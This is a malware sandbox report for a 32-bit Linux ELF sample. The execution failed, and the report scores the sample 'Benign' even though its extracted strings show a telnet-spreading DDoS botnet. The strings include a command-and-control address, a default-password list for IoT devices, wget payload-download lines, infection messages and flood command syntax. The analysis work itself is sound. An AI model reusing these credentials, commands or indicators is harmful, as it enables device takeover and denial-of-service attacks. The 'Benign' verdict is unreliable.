Analysis

Category Package Started Completed Duration Options Log
FILE elf 2019-10-09 21:21:07 2019-10-09 21:21:23 16 seconds Show Options Show Log
  • Info: Analysis failed: Unable to import package "modules.packages.elf", does not exist.
procdump = 1
2019-10-09 22:21:08,000 [root] INFO: Date set to: 10-09-19, time set to: 21:21:08, timeout set to: 200
2019-10-09 22:21:08,062 [root] DEBUG: Starting analyzer from: C:\yktra
2019-10-09 22:21:08,062 [root] DEBUG: Storing results at: C:\FUmMgi
2019-10-09 22:21:08,062 [root] DEBUG: Pipe server name: \\.\PIPE\vaGzMeGSW
2019-10-09 22:21:08,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-09 22:21:08,062 [root] INFO: Automatically selected analysis package "elf"
2019-10-09 22:21:08,062 [root] ERROR: Traceback (most recent call last):
  File "C:\yktra\analyzer.py", line 1328, in <module>
    success = analyzer.run()
  File "C:\yktra\analyzer.py", line 1045, in run
    "not exist.".format(package_name))
CuckooError: Unable to import package "modules.packages.elf", does not exist.
Traceback (most recent call last):
  File "C:\yktra\analyzer.py", line 1328, in <module>
    success = analyzer.run()
  File "C:\yktra\analyzer.py", line 1045, in run
    "not exist.".format(package_name))
CuckooError: Unable to import package "modules.packages.elf", does not exist.

MalScore

0.0

Benign

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-10-09 21:21:07 2019-10-09 21:21:23

File Details

File Name 085d7d08203b2395d896b976c6003cbe
File Size 73032 bytes
File Type ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=434003046dcade88a27ae40fa0825f65a6ec861c, not stripped
MD5 085d7d08203b2395d896b976c6003cbe
SHA1 e6cd9d4a0f1efd257103568a260331f6185240d1
SHA256 5bb366e39c5ac89746537ca13d4ca2309b6852a1ac474194dcb03e1df5088950
SHA512 71862641c1713115925e7a02afb9899fa55a5ce967f3a324e46e59c03eabe14f09b06690164bdeed94a22a22ce9e8a1461d957718a1b1a06189baba05b3be4a8
CRC32 368DC782
Ssdeep 768:GzYiFQUXAp0oZEupX9CwaQEGF/J+4NdhQbh+KEBqT+asl:FiSXR9CwaRGvPNdhQbhwE
TrID
  • 50.1% (.) ELF Executable and Linkable format (Linux) (4025/14)
  • 49.8% (.O) ELF Executable and Linkable format (generic) (4000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

No signatures


Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
/lib/ld-linux.so.2
libpthread.so.0
_ITM_deregisterTMCloneTable
_Jv_RegisterClasses
_ITM_registerTMCloneTable
write
vfork
waitpid
__errno_location
fcntl
connect
sendto
system
libc.so.6
_IO_stdin_used
strcasestr
socket
strcpy
execl
htonl
htons
sprintf
srand
fopen
perror
inet_ntoa
signal
strncpy
sigprocmask
select
_exit
getpid
isspace
strtok
fgets
strlen
prctl
sigemptyset
memset
strstr
chdir
toupper
getsockopt
herror
shutdown
sigaddset
inet_addr
fputs
memcpy
fclose
setsockopt
malloc
strcat
strcasecmp
bzero
ioctl
gethostbyname
usleep
getcwd
bcopy
strchr
getsockname
setsid
getdtablesize
strcmp
__libc_start_main
ntohl
snprintf
__gmon_start__
GLIBC_2.0
GLIBC_2.1
PTRh@
jaWVj
jAWVj
jaWVj
173.212.226.176:1665
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
telnet
admin
login
support
cisco
netgear
dreambox
D-Link
netman
wlseuser
ttnet
Admin
password
XA1bac0MX
public
0987654321
1234567
guest
raspberry
7ujMko0vizxv
7ujMko0admin
12345
default
administrator
1234567890
private
654321
87654321
123456789
admin1234567890
admin1234
123456
54321
1234admin
1q2w3e
ztonpk
7654321
987654321
12345678
12345Admin
56789Admin
1234Admin
tzlkisonpk
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
sername
assword
dvrdvs
nvalid
ailed
ncorrect
enied
oodbye
busybox
shell
WRECKED
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
:>%$#
%d.%d.%d.%d
gethostbyname
setsockopt
connect
0.0.0.0
TELNET LOGIN CRACKED - %s:%s:%s
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
INFECTION SUCCESS - %s:%s:%s
Telnet'd %s|%s|%s|23
FAILED TO INFECT - %s:%s:%s
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
wget -s -U "
wget -O /tmp/yuagwduiagwdhg/a -U "
PONG!
TEST %s
SPOOF
KILLSUB
KILLSUB <sub version to kill>
not killing myself cuz im not that version
TABLE
SCAN <threads> <timeout>
Starting scanner!!
GETLOCALIP
My IP: %s
GETPUBLICIP
My Public IP: %s
VERSION
Version: %d.%d
RANGE
RANGE <option 0-idk>
Range %d->%d
DOUSPOOFBRAH?
FUK YEA I DO (%s)
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>
mkdir /tmp/yuagwduiagwdhg
rm -fr /tmp/yuagwduiagwdhg
VIEWPAGE
VIEWPAGE <http ip url>
CNC <target> <port> <time>
STD <target> <port> <time>
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
GetWrecked
/etc/rc.d/rc.local
/etc/rc.conf
BUILD %s
%s 2>&1
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6279
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
kaiten.c
i.5077
printchar
prints
printi
print
fdopen_pids
hextable
ipState
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
setsockopt@@GLIBC_2.0
__libc_csu_fini
sendTCP
dup2@@GLIBC_2.0
strstr@@GLIBC_2.0
gotIP
contains_success
strcmp@@GLIBC_2.0
useragents
tmpdirs
read@@GLIBC_2.0
sclose
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
dupppp
processCmd
printf@@GLIBC_2.0
rangesA
versionnnn
readUntil
read_with_timeout
_exit@@GLIBC_2.0
sigprocmask@@GLIBC_2.0
free@@GLIBC_2.0
mainCommSock
memcpy@@GLIBC_2.0
contains_response
bzero@@GLIBC_2.0
fgets@@GLIBC_2.0
StartTheLelz
isspace@@GLIBC_2.0
advances2
_edata
spoofTest
read_until_response
fclose@@GLIBC_2.1
time@@GLIBC_2.0
inet_ntoa@@GLIBC_2.0
currentServer
contains_string
recvLine
getRandomPublicIP
signal@@GLIBC_2.0
getRandomPublicIPA
sleep@@GLIBC_2.0
select@@GLIBC_2.0
chdir@@GLIBC_2.0
listFork
_fini
getRandomPublicIPC
infectedmessage
advance_state
macAddress
subversionnnn
sendSTD
usernames
htons@@GLIBC_2.0
fdpopen
initConnection
getsockopt@@GLIBC_2.0
ioctl@@GLIBC_2.0
sendHTTP2
fdpclose
fdgets
rangesB1
sendCNC
perror@@GLIBC_2.0
bcopy@@GLIBC_2.0
waitpid@@GLIBC_2.0
passwords
usleep@@GLIBC_2.0
strcat@@GLIBC_2.0
strcpy@@GLIBC_2.0
getpid@@GLIBC_2.0
ourPublicIP
reset_telstate
malloc@@GLIBC_2.0
__data_start
getBuild
system@@GLIBC_2.0
ntohl@@GLIBC_2.0
getdtablesize@@GLIBC_2.0
rangesC2
__gmon_start__
exit@@GLIBC_2.0
kill@@GLIBC_2.0
makeRandomStr
__dso_handle
open@@GLIBC_2.0
socket_connect
_IO_stdin_used
getHost
setsid@@GLIBC_2.0
feof@@GLIBC_2.0
srand@@GLIBC_2.0
strchr@@GLIBC_2.0
getcwd@@GLIBC_2.0
szprintf
strlen@@GLIBC_2.0
ourIP
__libc_start_main@@GLIBC_2.0
write@@GLIBC_2.0
oldranges
strcasecmp@@GLIBC_2.0
__libc_csu_init
fcntl@@GLIBC_2.0
sigaddset@@GLIBC_2.0
uppercase
fopen@@GLIBC_2.1
memset@@GLIBC_2.0
snprintf@@GLIBC_2.0
sendHTTP
__errno_location@@GLIBC_2.0
getOurIP
fails
strncpy@@GLIBC_2.0
_start
makeIPPacket
_fp_hw
numpids
prctl@@GLIBC_2.0
herror@@GLIBC_2.0
infected
execl@@GLIBC_2.0
sockprintf
pipe@@GLIBC_2.0
rand@@GLIBC_2.0
getRandomPublicIP2
wildString
sendUDP
vfork@@GLIBC_2.0
__bss_start
tcpcsum
sendto@@GLIBC_2.0
strtok@@GLIBC_2.0
getBogos
contains_fail
fork@@GLIBC_2.0
sigemptyset@@GLIBC_2.0
getRandomPublicIPB
htonl@@GLIBC_2.0
toupper@@GLIBC_2.0
findARandomIP
rand_cmwc
zprintf
_Jv_RegisterClasses
strcasestr@@GLIBC_2.1
getsockname@@GLIBC_2.0
init_rand
parseHex
connectTimeout
sprintf@@GLIBC_2.0
advances
rangesB2
atoi@@GLIBC_2.0
matchPrompt
getCores
rangechoice
socket@@GLIBC_2.0
__TMC_END__
_ITM_registerTMCloneTable
scanPid
get_telstate_host
inet_addr@@GLIBC_2.0
negotiate
rangesC3
gethostbyname@@GLIBC_2.0
successes
shutdown@@GLIBC_2.0
fputs@@GLIBC_2.0
connect@@GLIBC_2.0
_init
commServer
recv@@GLIBC_2.0
echoLoader
close@@GLIBC_2.0
rangesC1
oldranges2
infect
contains_infectmessage
send@@GLIBC_2.0
getRandomIP
This file is not on VirusTotal.

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 0.19 seconds )

  • 0.084 TrID
  • 0.045 CAPE
  • 0.041 TargetInfo
  • 0.007 AnalysisInfo
  • 0.007 NetworkAnalysis
  • 0.005 Strings
  • 0.001 Debug

Signatures ( 0.225 seconds )

  • 0.184 antianalysis_detectfile
  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 persistence_autorun
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail

Reporting ( 0.0 seconds )

Task ID 94383
Mongo ID 5d9e4f54c3c009112d67b3d2
Cuckoo release 1.3-CAPE
Delete